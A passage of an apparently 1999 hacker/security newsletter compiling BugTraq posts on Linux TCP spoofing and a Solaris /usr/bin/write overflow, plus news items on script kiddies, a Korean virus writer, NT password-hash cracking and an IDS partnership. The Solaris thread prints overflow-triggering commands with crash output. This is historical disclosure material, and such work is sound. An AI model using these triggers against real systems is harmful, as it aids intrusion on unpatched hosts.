  3760.       gRK5LACgoAqLFk10kAMu6xb3ftO4+INJs14Ani+1hujlYRxYphN97c5ci8WtILNZ
  3761.       =L3C6
  3762.       - ----
  3763.       -----BEGIN PGP SIGNATURE-----
  3764.       Version: PGP for Personal Privacy 5.0
  3765.       Charset: noconv
  3766.       
  3767.       iQA/AwUBNvLqq6F4LLqP1YESEQJH5QCg4FIv1+eRED+wYV5uMp2nVto/zHMAnjii
  3768.       g3Q3t36ITPBKkdRCQGK4DCBe
  3769.       =yLGh
  3770.       -----END PGP SIGNATURE-----
  3771.       
  3772.       --------------------------------------------------------------------------
  3773.       
  3774.       Date: Wed, 10 Mar 1999 12:17:25 -0800
  3775.       From: John D. Hardin <jhardin@WOLFENET.COM>
  3776.       To: BUGTRAQ@netspace.org
  3777.       Subject: Re: Linux Blind TCP Spoofing (fwd)
  3778.       
  3779.       ---------- Forwarded message ----------
  3780.       Date: Wed, 10 Mar 1999 19:46:13 +0000 (GMT)
  3781.       >From: Alan Cox <alan@lxorguk.ukuu.org.uk>
  3782.       To: jhardin@WOLFENET.COM
  3783.       Subject: Re: Linux Blind TCP Spoofing
  3784.       
  3785.       > > It is recommended that kernels below version 2.0.36 be upgraded to
  3786.       > > eliminate this vulnerability.
  3787.       >
  3788.       > This implies but does not explicitly state that 2.0.36+ kernels are
  3789.       > not vulnerable. Is this the case?
  3790.       
  3791.       NAI reported the problem to me during the 2.0.36 development period and
  3792.       the bug was squashed.
  3793.       
  3794.       @HWA
  3795.   
  3796.  06.0 Solaris 2.6 x86 /usr/bin/write buffer overflow exploit
  3797.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3798.       
  3799.       Date: Mon, 8 Mar 1999 15:30:36 +0900
  3800.       From: bugscan@KOSNET.NET
  3801.       To: BUGTRAQ@netspace.org
  3802.       Subject: Solaris "/usr/bin/write" bug
  3803.       
  3804.       This is my first post to BugTraq
  3805.       If this is old, I'm sorry.
  3806.       when playing around with "/usr/bin/write" on Solaris 2.6 x86 , I found something
  3807.        interesting.
  3808.       It's buffer overflow bug in "/usr/bin/write"
  3809.       To ensure, view this command :
  3810.       
  3811.       ( Solaris 2.6 x86 )
  3812.       [loveyou@/user/loveyou/buf]{30}% write loveyou `perl -e 'print "x" x 97'`
  3813.       [loveyou@/user/loveyou/buf]write loveyou `perl -e 'print "x" x 97'`
  3814.       xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
  3815.       xxxxxxxxxxxxxxxxx permission denied
  3816.       [loveyou@/user/loveyou/buf]write loveyou `perl -e 'print "x" x 98'`
  3817.       Segmentation fault
  3818.       
  3819.       ( Solaris 2.5.1(2.5) sparc )
  3820.       [love]/home/love> write loveyou `perl -e 'print "x" x 79'`
  3821.       xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
  3822.       permission denied
  3823.       [love]/home/love> write loveyou `perl -e 'print "x" x 80'`
  3824.       Segmentation Fault
  3825.       
  3826.       ( Solaris 2.6 and 2.7 maybe .. )
  3827.       
  3828.       bye bye ~    :)
  3829.       
  3830.       ----------------------------------------------------------------------------------
  3831.       
  3832.       Date: Tue, 9 Mar 1999 17:16:26 +0000
  3833.       From: John RIddoch <jr@SCMS.RGU.AC.UK>
  3834.       Reply-To: John Riddoch <jr@master.scms.rgu.ac.uk>
  3835.       To: BUGTRAQ@netspace.org
  3836.       Subject: Re: Solaris "/usr/bin/write" bug
  3837.       
  3838.       >when playing around with "/usr/bin/write" on Solaris 2.6 x86 , I found
  3839.       something
  3840.       > interesting.
  3841.       >It's buffer overflow bug in "/usr/bin/write"
  3842.       >To ensure, view this command :
  3843.       >
  3844.       >( Solaris 2.6 x86 )
  3845.       >[loveyou@/user/loveyou/buf]{30}% write loveyou `perl -e 'print "x" x 97'`
  3846.       >[loveyou@/user/loveyou/buf]write loveyou `perl -e 'print "x" x 97'`
  3847.       >xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
  3848.       >( Solaris 2.6 and 2.7 maybe .. )
  3849.       
  3850.       This also segfaults under Solaris 2.6 and 7 on SPARC.
  3851.       
  3852.       I'm not sure how exploitable this is, as it is only sgid tty, which isn't a
  3853.       huge problem (but could be nonetheless, I suppose).
  3854.       
  3855.       --
  3856.       John Riddoch    Email: jr@scms.rgu.ac.uk        Telephone: (01224)262730
  3857.       Room C4, School of Computer and Mathematical Science
  3858.       Robert Gordon University, Aberdeen, AB25 1HG
  3859.       I am Homer of Borg. Resistance is Fu... Ooooh! Donuts!
  3860.       
  3861.       ----------------------------------------------------------------------------------
  3862.       
  3863.       Date: Tue, 9 Mar 1999 21:22:17 -0600
  3864.       From: Chris Tobkin <tobkin@umn.edu>
  3865.       To: BUGTRAQ@netspace.org
  3866.       Subject: Re: Solaris "/usr/bin/write" bug
  3867.       
  3868.       > ( Solaris 2.6 and 2.7 maybe .. )
  3869.       
  3870.       (Solaris 2.7 x86)
  3871.       [tobkin@2.7_x86](~)9:09pm> write loveyou `perl -e 'print "x" x 93'`
  3872.       xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
  3873.       xxxxxxxxxxxxxxxxx permission denied
  3874.       [tobkin@2.7_x86](~)9:09pm> write loveyou `perl -e 'print "x" x 94'`
  3875.       Segmentation fault
  3876.       
  3877.       
  3878.       (Solaris 2.6 sparc)
  3879.       [tobkin@2.6_sparc](~)9:12pm> write loveyou `perl -e 'print "x" x 91'`
  3880.       xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
  3881.       xxxxxxxxxxxxxxx permission denied
  3882.       [tobkin@2.6_sparc](~)9:12pm> write loveyou `perl -e 'print "x" x 92'`
  3883.       Segmentation fault
  3884.       
  3885.       Looks like 2.6 for sparc and 2.7 intel have the same problem...
  3886.       
  3887.       // chris
  3888.       tobkin@umn.edu
  3889.       
  3890.       *************************************************************************
  3891.       Chris Tobkin                                               tobkin@umn.edu
  3892.       Java and Web Services - Academic and Distributed Computing Services - UMN
  3893.        -----------------------------------------------------------------------
  3894.       Laura: I took a business course at business college--
  3895.       Jim: How did that work out?
  3896.       Laura: Well, not very well...I had to drop out, it gave me...indigestion.
  3897.                                      - Tennessee Williams - The Glass Menagerie
  3898.       *************************************************************************
  3899.       
  3900.       ----------------------------------------------------------------------------------
  3901.       
  3902.       Date: Tue, 9 Mar 1999 15:45:16 +0000
  3903.       From: Dan - Sr. Admin <dm@GLOBALSERVE.NET>
  3904.       To: BUGTRAQ@netspace.org
  3905.       Subject: Re: Solaris "/usr/bin/write" bug
  3906.       
  3907.       > This is my first post to BugTraq
  3908.       > If this is old, I'm sorry.
  3909.       > when playing around with "/usr/bin/write" on Solaris 2.6 x86 , I found something
  3910.       >  interesting.
  3911.       > It's buffer overflow bug in "/usr/bin/write"
  3912.       > To ensure, view this command :
  3913.       
  3914.       [snip]
  3915.       
  3916.       > ( Solaris 2.6 and 2.7 maybe .. )
  3917.       >
  3918.       > bye bye ~    :)
  3919.       
  3920.       Confirmed under Sparc Solaris 2.6.
  3921.       
  3922.       Although I have no source code to verify this, I would assume the problem
  3923.       lies in a sprintf() call (or something similiar) that builds the device to
  3924.       open from the tty you specify on the command line.
  3925.       
  3926.       However, even if this is overflowable into a shell with tty permissions,
  3927.       I can see nothing useful coming out of it.
  3928.       
  3929.       crw--w----   1 dm       tty       24,  0 Mar  9 14:39 pts@0:0
  3930.       
  3931.       Those are the permissions on the terminal.  The most I can see happening is
  3932.       someone writing to my screen when I have messages turned off.
  3933.       
  3934.       Regards,
  3935.       --
  3936.       Dan Moschuk (TFreak!dm@globalserve.net)
  3937.       Senior Systems/Network Administrator
  3938.       Globalserve Communications Inc., a Primus Canada Company
  3939.       "Be different: conform."
  3940.       
  3941.         
  3942.       @HWA
  3943.       
  3944.  07.0  New Computer Technology Makes Hacking a Snap - Washington Post
  3945.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3946.         
  3947.        FUD throughout this article on script kiddies, but still a good 
  3948.        entertaining read and worthy of your time ... 
  3949.        
  3950.        http://www.washingtonpost.com/wp-srv/WPcap/1999-03/10/024r-031099-idx.html
  3951.  
  3952.        New Computer Technology Makes Hacking a Snap
  3953.  
  3954.        By Michael E. Ruane
  3955.        Washington Post Staff Writer
  3956.        Wednesday, March 10, 1999; Page A01 
  3957.  
  3958.        Used to be you had to have some know-how to crash a kernel. It would
  3959.        take all night to snoop a connection, smash a stack or crack a password.
  3960.        You could work forever trying to get to root.
  3961.   
  3962.        Not any more.
  3963.   
  3964.        Nowadays, any fresh-faced newbie can download a kiddie script, fire off a
  3965.        vulnerability scan and, in no time, come up with a nice, juicy target list.
  3966.   
  3967.        It's enough to make veteran hackers -- the handful of computer wizards
  3968.        who speak a colorful language that once was all their own -- break down
  3969.        and cry.
  3970.   
  3971.        But it's true. Along with the breathtaking advances in computer technology
  3972.        has come a vast proliferation of easy, ready-to-use computer hacking
  3973.        programs, freely available on the Internet, and a boon to greenhorn
  3974.        hackers.
  3975.   
  3976.        "This is your nephew or your cousin," says Peter Tippett, president of the
  3977.        Reston-based International Computer Security Association. "It's a kid who
  3978.        says, 'This seems kind of cool. Let me just take this tool and aim it at Ford
  3979.        Motor Company.' "
  3980.   
  3981.        They use programs -- called "exploits," "tools" or "attacks" -- with names
  3982.        like "Smurf," "Teardrop" and "John the Ripper."
  3983.   
  3984.        Some are so-called "denial of service" programs, which sneak or barge in
  3985.        and overwhelm a targeted system, shutting it down. Others are
  3986.        "vulnerability scanners," which search the Net for specific weaknesses to
  3987.        be exploited later. Still others are "penetration" attacks that break in and
  3988.        take control.
  3989.   
  3990.        Some attacks use a "Trojan Horse" -- benign-looking bait with an exploit
  3991.        concealed inside. Others "spoof," using a bogus ID. Still others lie in wait
  3992.        and spring when an unsuspecting victim pauses to visit.
  3993.   
  3994.        A few are simply sent out to "sniff the traffic" on the Internet.
  3995.   
  3996.        There are hundreds of them. So many that some have been given the name
  3997.        kiddie scripts, because of their simplicity of use. Those who launch them
  3998.        are called, of course, script kiddies. And experts say they may account for
  3999.        95 percent of all external computer hacking attacks.
  4000.   
  4001.        Hacking always seems to have been the purview of the young. Just last
  4002.        year, five teenagers hacked into Defense Department computers, and last
  4003.        month, a 15-year-old from Vienna was accused of hacking into Clemson
  4004.        University's system and of trying to break into NASA's.
  4005.   
  4006.        Experts believe there are now tens of thousands of hacking-related Web
  4007.        sites, and hundreds that approach the subject seriously. The Pentagon,
  4008.        traditionally the most assailed hacking target on Earth, announced Friday
  4009.        that it is investigating another potent attack -- one of the 80 to 100 it
  4010.        undergoes every day.
  4011.   
  4012.        But in years past, hacking was tedious, demanding work that required
  4013.        brains and dedication, and, if successful, was an envied notch in the cyber
  4014.        gun. There was hacker esprit. There was a great "signal-to-noise" ratio --
  4015.        intelligent talk vs. baloney. And there was the hacker code: Look, but
  4016.        don't touch.
  4017.   
  4018.        No longer.
  4019.   
  4020.        "It used to be a small circle," says Dr. Mudge, a veteran Boston-area
  4021.        hacker who operates a Web site with his sidekicks Kingpin, Brian
  4022.        Oblivion, SpaceRogue and others. "Now it's almost mainstream, and like
  4023.        anything that goes mainstream you get a lot of good and a lot of bad."
  4024.   
  4025.        "Now people can hack without having to pay their dues," says Rob Clyde,
  4026.        a vice president with the Rockville-based computer security firm, Axent
  4027.        Technologies Inc.
  4028.   
  4029.        "You no longer have to be an expert," he says. "You just have to have time
  4030.        and motive. And the motive often times now is vandalism, destruction, just
  4031.        blow away stuff, destroy it, make it look bad."
  4032.   
  4033.        Sometimes it's even worse.
  4034.   
  4035.        The FBI on Friday released an annual survey that it conducts with the San
  4036.        Francisco-based Computer Security Institute, reporting that criminal
  4037.        hacking caused $123 million in losses last year, and now posed "a growing
  4038.        threat to . . . the rule of law in cyberspace."
  4039.   
  4040.        Mostly, though, many experts say, the new add-water-and-stir hacking is
  4041.        for amateurs. And most of them are still pretty young.
  4042.   
  4043.        "We're talking 95 percent of hackers are script kiddies," Tippett says.
  4044.        "We're talking a million events a month where people run those tools to see
  4045.        what happens. Maybe one or two percent of hackers are people who
  4046.        know what the tool actually does."
  4047.   
  4048.        Peter Mell, a computer scientist at the National Institute of Standards and
  4049.        Technology, in Gaithersburg, says, "Ten years ago if you wanted to break
  4050.        into somebody's system, you would stay up all night long."
  4051.   
  4052.        "You would manually go to their computer, try a few things, if it didn't
  4053.        work you'd go to another computer, try a few things," he says. "Very
  4054.        tedious. You'd spend all night doing it."
  4055.   
  4056.        "Nowadays what somebody does is . . . at 6 o'clock, they download a
  4057.        vulnerability scanner and an associated attack. They set the vulnerability
  4058.        scanner running. They go out to a party . . . come home 11 at night. And
  4059.        their computer has compiled a list for them of 2,000 hosts on the Internet
  4060.        which are vulnerable to that attack."
  4061.   
  4062.        "All they have to do is type the name of the computer that is vulnerable into
  4063.        their attack script, and they have complete control of the enemy," he says.
  4064.   
  4065.        The actual damage done by hackers is uncertain and some experts
  4066.        suggested it is overstated by a computer industry eager to sell its services.
  4067.        Those experts estimate that 80 percent of hacking comes from within a
  4068.        corporation rather than through outside attacks.
  4069.   
  4070.        Hacking lingo seems filled with military references like "attack" and
  4071.        "target." But hacking also has -- along with its own magazines and an
  4072.        annual convention -- an idiom all its own.
  4073.   
  4074.        "Crashing a kernel," for example, refers to breaking down the core of an
  4075.        operating system. "Smashing a stack" means taking over a vital part of a
  4076.        computer's memory. "Snooping a connection" means breaking into a
  4077.        conversation between two other computers. And the ultimate feat, "getting
  4078.        to root," or more simply, "getting root," means seizing fundamental control
  4079.        of target system.
  4080.   
  4081.        Mell, 26, a surgeon's son from St. Louis who said his brother taught him to
  4082.        program in second grade, has conducted a study of published attacks that
  4083.        smash, crash, seize and snoop by monitoring what people request at
  4084.        hacker Web sites.
  4085.   
  4086.        He has named the array of published attacks the Global Attack Toolkit.
  4087.        And he has compiled a list of the top 20 recently most popular. He points
  4088.        out that most attacks can be defended with so called "patches," but a few
  4089.        are almost indefensible.
  4090.   
  4091.        One of the most popular -- number 2 on his list -- and one that's tough to
  4092.        counter is "Smurf."
  4093.   
  4094.        "It's an attack where you overwhelm an enemy system with a huge number
  4095.        of (information) packets . . . and their computer simply can't handle all of
  4096.        the packets," he says. "The computer shuts down. If it's a Web site, the
  4097.        Web site stops working. If it's the router going into the White House, the
  4098.        White House traffic stops flowing."
  4099.   
  4100.        Number one on his list was a Trojan Horse called "Back Orifice."
  4101.   
  4102.        In a paper he wrote last year, Mell mentioned one hacker Web site that
  4103.        lists 690 scripts, another that has 383 and another that lists 556.
  4104.   
  4105.        "Together, the exploit script Web sites form an attack tool kit that is
  4106.        available to literally everyone in the world," he wrote. "Somewhere on the
  4107.        Internet, there exists a host vulnerable to almost every attack, and scanning
  4108.        tools are readily available to find that host."
  4109.   
  4110.        Mell says the attack scripts are posted on hacker Web sites by other
  4111.        hackers, by disgruntled systems administrators trying to draw attention,
  4112.        and eventually patches, to holes in their systems, and by "white hat"
  4113.        hackers seeking to alert the computer security industry to vulnerabilities.
  4114.   
  4115.        And he believes that posting easy scripts may not be all bad.
  4116.   
  4117.        "When attacks are posted to the Internet, companies respond, and they fix
  4118.        their software very quickly, and they release patches, and there's news
  4119.        articles and advisories alerting people that there's this vulnerability," he
  4120.        says.
  4121.   
  4122.        "So by the public posting . . . in a way it makes the world safer, because
  4123.        everybody knows what's out there and they're prepared," he says. "If the
  4124.        scripts weren't published, intrusion-detection companies wouldn't know
  4125.        where to get their data, security companies wouldn't know that their
  4126.        applications had holes in them."
  4127.   
  4128.        "At the same time that these attack scripts make it available for anyone in
  4129.        the world with very little intelligence to download and run attacks, it also
  4130.        means that security companies are quick on their feet to respond to them."
  4131.   
  4132.        But computer security firms are not sitting idly by. They have their own
  4133.        intrusion detection programs -- some of which are recon missions, if you
  4134.        will, that "sniff" the traffic to ambush roving attack scripts.
  4135.   
  4136.        Mell says there is a "Virtual Suicide" Web site where systems operators
  4137.        can request an attack to test security. Visitors can ask to be "crippled,"
  4138.        "beheaded" or "vaporized."
  4139.   
  4140.        Perhaps the most sinister attacks, though, are passive. Apparently small in
  4141.        number, Mell says in his report, they "require a target to visit the hacker's
  4142.        Web site" before striking. 
  4143.   
  4144.        Soon, he writes, "the Internet may develop 'bad parts of town.'"
  4145.   
  4146.        "Watch where you walk!" 
  4147.   
  4148.        ⌐ Copyright 1999 The Washington Post Company
  4149.               
  4150.        @HWA
  4151.        
  4152.   08.0 "Super Hacker Apprehended"
  4153.        ~~~~~~~~~~~~~~~~~~~~~~~~~~
  4154.        
  4155.        Seen initially on Help Net Security's site the article is printed
  4156.        here below;
  4157.        
  4158.        KOREAN "SUPERHACKER" BUSTED
  4159.        by deepcase, Tuesday 9th Mar 1999 on 1:05 pm CET
  4160.        Kim, a 15 year old high school student from Korea got busted by the
  4161.        police after after 152 people complained about the "super viruses" that
  4162.        he distributed by email. Kim told police that he mailed the viruses to
  4163.        demonstrate his talents and to find out if anyone could break them. The 
  4164.        viruses were so complex that they were virtually impossible to kill. 
  4165.        The spokesman said that Kim was known as a computer genius from the 7th
  4166.        grade, when he learned to handle the machine code language assembly 3. 
  4167.        The spokesman added "Kim is one of just forty to fifty people in Korea 
  4168.        with such a talent" . A National Police Officier said that Kim could have
  4169.        became a "national treasure" in the information society of the future and
  4170.        that he will guide Kim along the legal path of computer work.
  4171.        
  4172.        Referenced url: http://www.chosun.com/w21data/html/news/199903/199903050334.html
  4173.              
  4174.        
  4175.        Super Hacker Apprehended 
  4176.  
  4177.  
  4178.        A police spokesman announced Friday that officers had apprehended a
  4179.        super hacker who turned out to be a fifteen year old high school boy named
  4180.        Kim. To date 152 people have filed complaints about the 15 super viruses
  4181.        Kim created and e-mailed, but police expect the final figure to be over
  4182.        2,000. 
  4183.  
  4184.        Kim told police that he mailed the viruses to demonstrate his talents and to
  4185.        find out if anyone could develop a 'vaccine' for them. The viruses were so
  4186.        complex that they were virtually impossible to kill. The spokesman said that
  4187.        Kim was known as a computer genius from the 7th grade, when he learned
  4188.        to handle the machine code language 'assembly 3'. one of just forty to fifty
  4189.        people in Korea with such a talent. 
  4190.  
  4191.        Yang Keun-won, head of the National Police Office's computer crime team
  4192.        commented that a virus creator and hacker like Kim could become a
  4193.        "national treasure" in the information society of the future. He added that he
  4194.        will guide Kim along the legal path of computer work. 
  4195.  
  4196.        (Park Joon-hyun, jhpark@chosun.com) 
  4197.  
  4198.  
  4199.  
  4200.               
  4201.   
  4202.        @HWA       
  4203.        
  4204.   09.0 The l0pht and NFR team up to produce top flight IDS
  4205.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4206.        
  4207.        http://www.nfr.net/news/press/19990301-l0pht-filters.html
  4208.        
  4209.        
  4210.        NFR and L0pht to Deliver Best-of-Breed Intrusion Detection
  4211.                                                           
  4212.        L0pht to use extensive knowledge of attack signatures to expand filter set
  4213.        for NFR software
  4214.        
  4215.        
  4216.        01 March 1999 Washington, DC and Boston, MA Network Flight Recorder«
  4217.        (Bloomberg Ticker: 9022Z EQUITY) and L0pht Heavy Industries, Inc. today
  4218.        announced a strategic relationship that redefines the boundaries for
  4219.        cooperation in intrusion detection. In a partnership that combines the
  4220.        respected "white-hat" knowledge of attack signatures with the industry
  4221.        leading intrusion detection engine, L0pht will create a large set of
  4222.        backends for the NFR software. 
  4223.        
  4224.        
  4225.        The backends, or filters, will provide users with real-time alerts for
  4226.        various types of intrusions and unwanted activity on their networks,
  4227.        including information gathering, denial of service, and network attacks.
  4228.        As soon as the NFR system is attached to the network, the new backends
  4229.        will begin watching for common and obscure attacks. 
  4230.        
  4231.        
  4232.        New backends, which will be provided to users on a monthly basis, will
  4233.        watch for the latest attacks.  Administrators can automatically push the
  4234.        new backends to remote NFR systems, without having to upgrade or modify
  4235.        any software. Because the backends will be written in N-Code, NFR's
  4236.        flexible open-standard traffic analysis specification language, users can
  4237.        examine and verify the underlying code, or modify them to match their
  4238.        internal security policies. 
  4239.        
  4240.        
  4241.        Commenting on the partnership, Marcus J. Ranum, President and CEO of
  4242.        Network Flight Recorder, noted, "L0pht has an amazing depth of information
  4243.        about system vulnerabilities, and are the ideal source for cutting edge
  4244.        intrusion detection signatures. By adding their 'white-hat' knowledge to
  4245.        our existing capabilities, we have an unbeatable combination. Today, NFR
  4246.        is the most popular intrusion detection and monitoring system for many of
  4247.        our users based on its powerful customizable capabilities – with the
  4248.        formation of this partnership we further cement our lead in the industry."
  4249.        In a recent user poll, NFR soundly outperformed intrusion detection
  4250.        products from Axent (NASDAQ: AXNT), ISS (NASDAQ: ISSX), and Cisco (NASDAQ:
  4251.        CSCO). "When real network managers and users rate your product as best,
  4252.        that’s satisfying," continues Ranum. "Our product shines where it
  4253.        matters the most: solving real problems and securing real networks for
  4254.        real network managers." 
  4255.        
  4256.        
  4257.        "Having the ability to handle strange network traffic in a flexible manner
  4258.        and the ability to tweak even the lowest level components of the intrusion
  4259.        detection engine offers a functionality scope and comfort level that other
  4260.        products simply cannot attain," said Dr. Mudge of L0pht Heavy Industries,
  4261.        Inc. "In this field the consumer is really purchasing an elevation in
  4262.        ‘peace-of-mind’  about the way their network works. This cannot
  4263.        be done on blind faith alone. NFR was the only commercial package capable
  4264.        of being used for intrusion detection that released full source code to
  4265.        the academic community. Combine this with the network and computer
  4266.        security expertise that is found at L0pht and the history that L0pht has
  4267.        for being a ‘consumer watchgroup’ – the two companies
  4268.        working together on projects was a logical next step." 
  4269.        
  4270.        
  4271.        Availability
  4272.        
  4273.        
  4274.        The L0pht intrusion detection backends will be included in the next
  4275.        commercial release of the NFR software, scheduled for availability in
  4276.        early second quarter 1999. NFR software can be purchased from certified
  4277.        NFR resellers worldwide. 
  4278.        
  4279.        
  4280.        About Network Flight Recorder (NFR) 
  4281.        
  4282.        
  4283.        Network Flight Recorder, with offices around the United States and
  4284.        resellers worldwide, is a leading developer of intrusion detection,
  4285.        network traffic, and network analysis tools. The flexibility of the NFR
  4286.        software provides effective local and distributed misuse detection
  4287.        solutions for small, medium, and large environments. NFR’s highly
  4288.        customizable technology is deployed at more than 1,000 sites worldwide,
  4289.        including financial institutions, government, military and intelligence
  4290.        agencies, and Fortune 500 firms. NFR news and company information can be
  4291.        found on The Bloomberg under the ticker symbol: 9022Z EQUITY and on the
  4292.        World Wide Web at http://www.nfr.net. 
  4293.        
  4294.        
  4295.        About L0pht Heavy Industries, Inc. 
  4296.        
  4297.        
  4298.        L0pht [L0PHT] Heavy Industries, Inc., has been recognized as a collection
  4299.        of some of the top hackers in the US. Since the early 90s, L0pht has acted
  4300.        as a consumer watchgroup and underground engineering team whose goal has
  4301.        been improving computer and network security while educating users,
  4302.        programmers, and corporations. In 1997, L0pht released their Windows NT
  4303.        password-auditing tool, L0phtCrack, which quickly became the defacto
  4304.        standard auditing tool for both government and the commercial sector. On
  4305.        May 18, 1998, they presented expert testimony to the United States Senate
  4306.        on government systems security. The L0pht has appeared in Wired Magazine,
  4307.        Byte Magazine, various academic journals, BBC, The Washington Post, and
  4308.        numerous other publications.  http://www.L0pht.com. 
  4309.        
  4310.        
  4311.        Contact
  4312.        
  4313.        
  4314.        Network Flight Recorder
  4315.        Barnaby Page
  4316.        202.662.1400
  4317.        barnaby_page@nfr.net L0pht Heavy Industries
  4318.        http://www.l0pht.com [L0PHT]
  4319.        press@l0pht.com
  4320.        
  4321.        
  4322.        
  4323.        -o-
  4324.        Subscribe: mail majordomo@repsec.com with "subscribe isn".
  4325.        Today's ISN Sponsor: Internet Security Institute [www.isi-sec.com]
  4326.        
  4327.  10.0  A good example of how "Secure" NT really is
  4328.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4329.        
  4330.        From Network Computing via Techweb
  4331.        
  4332.        http://www.techweb.com/se/directlink.cgi?NWC19990308S0022
  4333.        
  4334.        March 08, 1999, Issue: 1005
  4335.        Section: Columnists
  4336.  
  4337.        With Friends Like These...
  4338.        Art Wittmann
  4339.  
  4340.        A couple of freelance writers are working on a story for us about security
  4341.        auditing and protection. As part of their "research," they decided to see if they
  4342.        could hack into one of our lab networks. It took them only a few hours to
  4343.        successfully break into our Windows NT boxes. And from there, they learned
  4344.        the configuration of our lab networks, the server names and functions, the
  4345.        operating systems we run and most of the passwords on the key accounts on
  4346.        our Microsoft Windows NT, Novell NetWare and Unix servers, as well as a
  4347.        good many of our routers and switches.
  4348.  
  4349.        Our lab is not run as a mission-critical production network-it isn't meant to be
  4350.        particularly secure. But we do stay up to date on most service packs and
  4351.        patches for the major operating systems. So, unless you've taken a very active
  4352.        stance on security for your network, you should be worried.
  4353.  
  4354.        Reusing Passwords? The hacking expertise of these guys is by no means
  4355.        unique. Plenty of people out there can do what they did, and some can do it
  4356.        better. While NT has its fair share of vulnerabilities out of the box, there is a
  4357.        LAN Manager issue that blows the doors wide open. In summary: NT stores
  4358.        password hashes in a format that is hard to crack by brute-force methods,
  4359.        and that's a good thing. However, Microsoft has chosen to maintain
  4360.        compatibility with LAN Manager's password store, and therefore keeps a
  4361.        second hash of passwords. This table isn't so secure. In fact, brute-force
  4362.        methods usually can come up with a few passwords in short order.
  4363.  
  4364.        Within two hours, our hackers had obtained 5,000 of our 5,045 passwords
  4365.        by brute-forcing them. A few days and millions of keystrokes later, using
  4366.        those same passwords, they owned the entire network. So, do you use the
  4367.        same passwords across all platforms?
  4368.  
  4369.        The problem is exacerbated for smaller shops where a single crew administers
  4370.        NT, NetWare, Unix and other systems because they tend to use the same
  4371.        administrator password for all systems under the group's management. For
  4372.        very obvious reasons, that's a bad idea. Our lab was no exception, and our
  4373.        hackers quickly infiltrated our NetWare and Unix servers, as well as our
  4374.        Cisco routers.
  4375.  
  4376.        Instructions for cleaning up this hole in NT are provided in the Microsoft
  4377.        Knowledge Base article Q147706. However, doing so may break
  4378.        applications that still use the LAN Manager hash table. In particular, if you're
  4379.        still using DOS or Windows 3.1, problems are likely. And if you're running
  4380.        OS/2 LAN Manager, implementing Microsoft's fix will break compatibility.
  4381.  
  4382.        From what I've read about this security hole in the writings from the hacker
  4383.        community, Service Pack 3 contains a number of security fixes that make it
  4384.        harder to crack passwords. These should be implemented, but regardless,
  4385.        LANMan compatibility needs to be disabled if you want your NT server to be
  4386.        secure.
  4387.  
  4388.        Expect Little Help From Microsoft Of course, Microsoft doesn't promote the
  4389.        fact that a security hole exists or that it can be patched. If you're clever enough
  4390.        to know about it and to ask the right questions, the company will provide a fix.
  4391.        In my opinion, that's something akin to Ford putting a sticky note on the
  4392.        bulletin board outside the CEO's office about a little Pinto gas-tank problem
  4393.        and then claiming that the hazard was adequately publicized.
  4394.  
  4395.        Finally, you'd think that Windows 2000 would be the perfect place for
  4396.        Microsoft to rid itself of this problem, wouldn't you? Well, just like me, you'd
  4397.        be wrong. It turns out that Microsoft is committed to maintaining LANMan
  4398.        compatibility in Windows 2000 out of the box.
  4399.  
  4400.        The moral of the story is clear: The onus is on you to protect the integrity of
  4401.        your systems; Microsoft is not going to go out of its way to help you. You
  4402.        must dedicate staff to following the security advisories about all your operating
  4403.        systems-simply looking at the vendor's home pages is not enough. A good
  4404.        many of the hackers out there publicize the security holes they know about.
  4405.        It's my advice that you heed them well.
  4406.  
  4407.        Send your comments on this column to Art Wittmann at
  4408.        awittmann@nwc.com.
  4409.  
  4410.        Copyright « 1999 CMP Media Inc.
  4411.        
  4412.        
  4413.        @HWA
  4414.        
  4415.  11.0 The Black Hat Briefings Security Conference
  4416.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4417.       (From the [ISN] list)
  4418.       
  4419.         Forwarded From: Jeff Moss <jm@defcon.org>
  4420.        
  4421.        
  4422.        
  4423.                            The Black Hat Briefings '99
  4424.                            http://www.blackhat.com/
  4425.                            July 7 - 8th, Las Vegas, Nevada
  4426.        
  4427.        
  4428.        Computer Security Conference Announcement Computer Security Conference
  4429.        
  4430.        
  4431.        Description and Overview
  4432.        
  4433.        
  4434.        It's late. You're in the office alone, catching up on some system
  4435.        administration tasks.  Behind you, your network servers hum along quietly,
  4436.        reliably. Life is good. No one can get to your data or disrupt your WAN. 
  4437.        The network is secure. Or is it?
  4438.        
  4439.        
  4440.        While we could create more fear, uncertainty, and doubt (FUD), we would
  4441.        rather announce The Black Hat Briefings '99 conference! The Black Hat
  4442.        Briefings conference series was created to provide in-depth information
  4443.        about current and potential threats against computer systems by the people
  4444.        who discover the threats. To do this, we assemble a group of vendor
  4445.        neutral security professionals and let them talk candidly about the
  4446.        security problems businesses face and the solutions they see to those
  4447.        problems.  No gimmicks, just straight talk by people who make it their
  4448.        business to explore the ever-changing security space.
  4449.        
  4450.        
  4451.        While many conferences focus on information and network security, only The
  4452.        Black Hat Briefings will put your managers, engineers, and software
  4453.        programmers face-to-face with today's cutting edge computer security
  4454.        experts and "underground" security specialists. New for 1999, there will
  4455.        be three tracks of speaking.  The "White Hat" track will inform your CEO
  4456.        or CIO with no-nonsense information about what issues to be aware of, and
  4457.        what they can ignore.  The two "Black Hat" tracks will provide your
  4458.        technical staff with nitty-gritty technical information about current and
  4459.        potential threats to your computer systems. 
  4460.        
  4461.        
  4462.        Only the Black Hat Briefings conference will provide your staff with the
